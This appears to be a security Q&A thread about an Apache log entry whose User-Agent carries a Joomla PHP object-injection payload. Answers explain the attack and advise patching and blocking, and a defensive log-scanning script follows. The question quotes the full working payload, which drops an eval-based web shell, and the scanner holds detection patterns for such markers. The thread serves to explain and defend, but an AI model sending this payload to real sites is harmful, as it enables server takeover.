Was user-agent identification used for some scripting attack technique?
Apache access log entries on my site are typically like this one:
207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact HTTP/1.1" 200 256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0.607 MISS 10.10.36.125:104 0.607
so you can see the user-agent field there. But today I also found the user-agent field used like this:
62.210.162.42 - - [31/Oct/2016:11:24:19 +0100] "GET / HTTP/1.1" 200 399 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:242:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."sqlconfigbak.php","|=|x3C".chr(63)."php x24mujj=x24_POST['z'];if(x24mujj!=''){x24xsser=base64_decode(x24_POST['z0']);@eval("x24safedg=x24xsser;");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}~Ů" 0.304 BYPASS 10.10.36.125:104 0.304
Was this an attack? The next log entry appears to have successfully retrieved (code 200) the file sqlconfigbak.php mentioned in the script, although I cannot find the file in the file system:
62.210.162.42 - - [31/Oct/2016:11:24:20 +0100] "GET //sqlconfigbak.php HTTP/1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0.244 BYPASS 10.10.36.125:104 0.244
Please, what was happening here?
Additionally to the other answers, note that the fact that this attack apparently worked suggests you are running an old, insecure version of PHP. A fix for the bug that this attack exploits was released in September 2015. Run your update process and make sure it pulls in the most recent version of PHP. And check for other outdated programs that are Internet-facing, too, as it seems your server hasn't been kept up-to-date for at least a year.
This is a Joomla 0 Day Attack. Information found here: blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html
This is not a vulnerability test despite the __test. It is an attack.
Make sure that any Joomla install is as up to date as possible.
Another option is to simply use .htaccess to intercept this exploit by looking for a common string, "__test" would work, and redirect to some other place.
The IP address that you linked does not resolve to a Google hostname, therefore it is not Google. The person or bot is scanning your site for vulnerabilities. The first one is attempting to find a Joomla vulnerability.
These events are a regular occurrence on most websites. You should ensure that you are following best practices and harden your website; the process is long and you will need to find and follow an online tutorial.
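A defender's check for this pattern, as an added example that is not part of the thread: it parses lines in the question's log format, flags a User-Agent carrying a PHP serialized object (reporting the "__test" marker the answers mention and the PHP calls inside it), and then reports a later request from the same client for any .php filename the payload named, which is the follow-up fetch the question observed. The sample log is constructed for the example and its payload line is a shortened, defanged stand-in for the one in the question.

```python
import re
from typing import Dict, List, Set, Tuple

# Log layout from the question; User-Agent is matched greedily to the last quote
# because an injected payload contains unescaped double quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3}) '
    r'\S+ "[^"]*" "(?P<agent>.*)"[^"]*$'
)
# A PHP serialized-object token never belongs in a legitimate User-Agent.
PHP_OBJECT_RE = re.compile(r'O:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{')
# Strings worth reporting next to a hit; "__test" is the marker the answers name.
SUSPICIOUS = ("__test|", "file_put_contents", "base64_decode", "eval(", "assert")
# Any quoted .php filename the payload names (the file it tries to write).
PHP_FILE_RE = re.compile(r'"/?([\w.-]+\.php)"')

def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    findings: List[Tuple[str, str, str]] = []   # (client ip, kind, detail)
    named: Dict[str, Set[str]] = {}   # ip -> .php names seen in its payloads
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        ip, agent = m["ip"], m["agent"]
        if PHP_OBJECT_RE.search(agent):
            markers = [s for s in SUSPICIOUS if s in agent]
            findings.append((ip, "object_injection",
                             f"PHP object in User-Agent, markers={markers}"))
            named.setdefault(ip, set()).update(PHP_FILE_RE.findall(agent))
        # A later request from the same client for a file its payload tried to
        # write is evidence the write succeeded (the 200 seen in the question).
        parts = m["request"].split(" ")
        path = parts[1] if len(parts) > 1 else parts[0]
        basename = path.split("?")[0].rsplit("/", 1)[-1]
        if basename in named.get(ip, set()):
            findings.append((ip, "dropped_file_fetch",
                             f"{path} -> HTTP {m['status']}"))
    return findings

# Constructed sample; the payload line is shortened and defanged (PLACEHOLDER).
SAMPLE_LOG = [
    '207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact HTTP/1.1" 200 256 '
    '"-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" '
    '0.607 MISS 10.10.36.125:104 0.607',
    '62.210.162.42 - - [31/Oct/2016:11:24:19 +0100] "GET / HTTP/1.1" 200 399 "-" '
    '"}__test|O:21:"JDatabaseDriverMysqli":1:{s:8:"feed_url";s:70:"file_put_contents('
    '$_SERVER["DOCUMENT_ROOT"].chr(47)."sqlconfigbak.php","PLACEHOLDER");";}" '
    '0.304 BYPASS 10.10.36.125:104 0.304',
    '62.210.162.42 - - [31/Oct/2016:11:24:20 +0100] "GET //sqlconfigbak.php HTTP/1.1" '
    '200 399 "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; '
    '+http://www.google.com/bot.html)" 0.244 BYPASS 10.10.36.125:104 0.244',
]
```

Running `scan_log(SAMPLE_LOG)` reports the injection line and the follow-up fetch that returned 200; feeding it a real access log works the same way because only the User-Agent and request fields are inspected.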